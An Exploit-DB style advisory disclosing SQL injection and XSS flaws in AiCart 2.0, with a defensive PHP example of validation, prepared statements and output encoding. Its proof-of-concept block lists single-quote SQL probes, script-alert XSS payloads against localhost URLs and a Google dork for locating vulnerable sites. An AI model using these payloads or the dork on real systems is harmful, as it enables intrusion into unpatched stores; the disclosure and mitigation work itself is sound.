Vendor: AiCart
By: takeshix
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection, XSS
CWE: 89 (SQL Injection), 79 (XSS)
Product Name: AiCart
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: -
CPE: a:aicart:aicart:2.0
Platforms Tested: Fedora
2011

AiCart 2.0 Multiple Vulnerabilities

AiCart 2.0 contains multiple SQL injection and cross-site scripting (XSS) vulnerabilities. The affected inputs shown in the proof of concept below are the pid and rid parameters of store.php and the nid parameter of news.php. An attacker can inject SQL and script payloads through these parameters, which can lead to the compromise of the application and the underlying system.

Mitigation:

Validate all user-supplied data to ensure that it is valid and expected, and sanitize it before using it in the application. Use parameterized queries to prevent SQL injection. Use a web application firewall to detect and block malicious requests.
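
The mitigation above applied to an id-style parameter such as nid, as an added example that is not AiCart code and not part of the original advisory. The table and column names (news, id, title, body) and the functions parse_id, h and view_news are hypothetical; it assumes PHP 7.1+ with the PDO SQLite driver so it can run offline against constructed sample data.

```php
<?php
// Added example: hypothetical handler, NOT AiCart source code.
// Table/column names (news, id, title, body) are assumptions.

// Constructed sample data in an in-memory SQLite database (runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (1, 'Sale <b>now</b>', 'Constructed sample row')");

// Accept only a positive decimal integer for id-style parameters (pid, rid, nid).
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (e.g. nid[]=1) and missing values are rejected
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Encode for an HTML text or quoted-attribute context so stored and
// reflected values are rendered as text, not markup.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function view_news(PDO $db, $rawNid): string
{
    $nid = parse_id($rawNid);
    if ($nid === null) {
        // Reject without echoing the raw value back into the page.
        return '<p>Invalid news id.</p>';
    }
    // The placeholder keeps the value out of the SQL text entirely.
    $stmt = $db->prepare('SELECT title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $nid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return '<p>News item not found.</p>';
    }
    return '<h1>' . h($row['title']) . '</h1><p>' . h($row['body']) . '</p>';
}

// Constructed inputs: a valid id, then the two input shapes from the PoC list.
foreach (['1', "'", "<script>alert('takeshix')</script>"] as $input) {
    echo view_news($db, $input), PHP_EOL;
}
```

The valid id renders the row with its title HTML-encoded; the other two inputs fail integer validation and never reach the query or the response body.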

Exploit-DB raw data:

=================================[ AiCart 2.0 Multiple Vulnerabilities ]===================================

== Infos ==================================================================================================

[ Date ]				[ 18.06.2011 ]
[ Software URL ]			[ http://www.aicart.ca/ ]
[ Version ]				[ 2.0 ]
[ Google Dork ]				[ inurl:'/store.php?action=view_product pid=' ]
[ System ]				[ PHP ]
[ Testing System ]			[ Fedora ]
[ Risk Level ]				[ High ]
[ CVE ]					[ - ]

== Author Details =========================================================================================

[ Author ]				[ takeshix ]
[ Author Contact ]			[ takeshix.query@googlemail.com ]

== PoC ====================================================================================================

[ SQLi ]	http://localhost/store.php?action=view_product?pid='
[ SQLi ]	http://localhost/store.php?rid='
[ SQLi ]	http://localhost/news.php?nid='&action=view

[ XSS ]		http://localhost/store.php?action=view_product?pid=<script>alert('takeshix')</script>
[ XSS ]		http://localhost/store.php?rid=<script>alert('takeshix')</script>
[ XSS ]		http://localhost/news.php?nid=<script>alert('takeshix')</script>&action=view

== Greez ==================================================================================================

[ hackademics ] [ DSU ] [ UNITS ]

=============================================[ hacktivistas ]==============================================